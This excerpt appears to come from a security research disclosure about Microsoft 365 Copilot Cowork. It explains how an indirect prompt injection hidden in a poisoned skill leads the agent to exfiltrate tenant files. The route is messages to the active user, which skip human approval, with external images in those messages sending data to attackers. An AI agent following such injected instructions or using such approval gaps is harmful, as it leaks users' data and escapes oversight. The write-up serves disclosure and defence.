This attack achieved a high success rate against state-of-the-art models, including Claude Opus 4.7.Copilot Cowork is a Frontier feature available now in Microsoft 365. It operates with the users’ Microsoft permissions and can use Microsoft Graph to read and operate on data in one’s Microsoft tenant.In this article, we demonstrate that through an indirect prompt injection in a poisoned skill, attackers can exfiltrate files from M365. This is done by exploiting the fact that, unlike other sensitive actions, sending emails and Teams messages to the active user does not require human approval, and opening the compromised messages in Teams or Outlook can trigger attacker-controlled network requests.This risk reflects that giving agents access to multiple systems expands the prompt-injection attack surface. In isolation, the agent’s intended capabilities are benign; however, due to the properties of the integrated systems, users are at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents. As this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem, rather than to a specific bug, we are publicizing this work to inform users of the risks they are accepting by using an agentic product of this nature.Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.Microsoft’s documentation on action approvals states, “[Copilot] Cowork asks for your permission before taking sensitive actions, like sending an email or posting a message in Teams.” However, in practice, when the recipient is the active user, these actions execute immediately without requiring human approval (users do not have a setting to modify this behavior). Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated...
First seen: 2026-05-25 22:24
Last seen: 2026-05-26 04:27